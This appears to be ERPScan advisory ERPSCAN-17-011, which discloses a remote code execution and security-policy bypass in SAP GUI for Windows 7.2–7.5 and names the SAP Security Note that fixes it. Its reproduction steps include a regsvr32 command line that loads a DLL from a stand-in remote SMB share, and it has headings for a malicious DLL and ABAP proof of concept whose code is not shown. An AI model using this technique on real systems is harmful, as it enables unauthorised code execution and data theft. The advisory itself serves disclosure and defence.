Close

HAVE QUESTIONS?

Contact us today.

Subscribe me to your mailing list

[ERPSCAN-17-011] SAP GUI for Windows – Remote Code Execution + bypass security policy

Application: SAP GUI
Versions Affected: SAP GUI 7.2-7.5
Vendor URL: SAP
Bugs: Remote Code Execution
Reported: 15.12.2016
Vendor response: 16.12.2016
Date of Public Advisory: 14.03.2017
Reference: SAP Security Note 2407616
Authors: Dmitry Yudin (ERPScan) aka @ret5et, Vahagn Vardanyan (ERPScan), Dmitry Chastuhin (ERPScan)

VULNERABILITY INFORMATION

Class: Remote Code Execution
Impact: Remote exploitation, bypass of security
Remotely Exploitable: yes
Locally Exploitable: no

CVSS Information

CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) High (H)
PR: Privileges Required (Level of privileges needed to exploit) High (H)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed (C)
C: Impact to Confidentiality High (H)
I: Impact to Integrity High (H)
A: Impact to Availability High (H)

Description

With a special ABAP code, an attacker can bypass SAP GUI security policy and execute the code.

Business risk

An attacker can use an RCE vulnerability for unauthorized execution of commands remotely. The commands will run with the same privileges of the service that executed a command. An attacker can access arbitrary files and directories located in an SAP-server filesystem including an application source code, configuration, and critical system files. It allows obtaining critical technical and business-related information stored in a vulnerable SAP system.

VULNERABLE PACKAGES

SAP GUI FOR WINDOWS 7.20 (no longer supported by SAP)
SAP GUI FOR WINDOWS 7.30 (no longer supported by SAP)
SAP GUI FOR WINDOWS 7.40 CORE SP00-SP011

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2407616

TECHNICAL DESCRIPTION

When we open SAP GUI > Options > Security > Security Configuration > Open security configuration, we can see the list of rules which SAP GUI uses. These rules determine whether or not to show security prompt during critical actions (e.g. when an ABAP code wants to read a local file, download a file from the server to client, or execute a program). Our research revealed that SAP GUI has a rule which allows reading, writing, executing of regsvr32.exe Windows application without the security prompt.

regsvr32.exe can load DLL files from a remote SMB share and execute DllMain function.

To reproduce:

  1. Compile a DLL (the source code can be found below) file
  2. Upload the DLL to any SMB share
  3. Create an ABAP program (ZMalw1) and change
  4. commandline = '/i /s \\remote_server\tmp\dllmain.dll' to your share path
  5. Execute the ABAP program
Process tree
Process tree

SAP GUI
SAP GUI

Proof of Concept

Malicious DLL file

Malicious ABAP code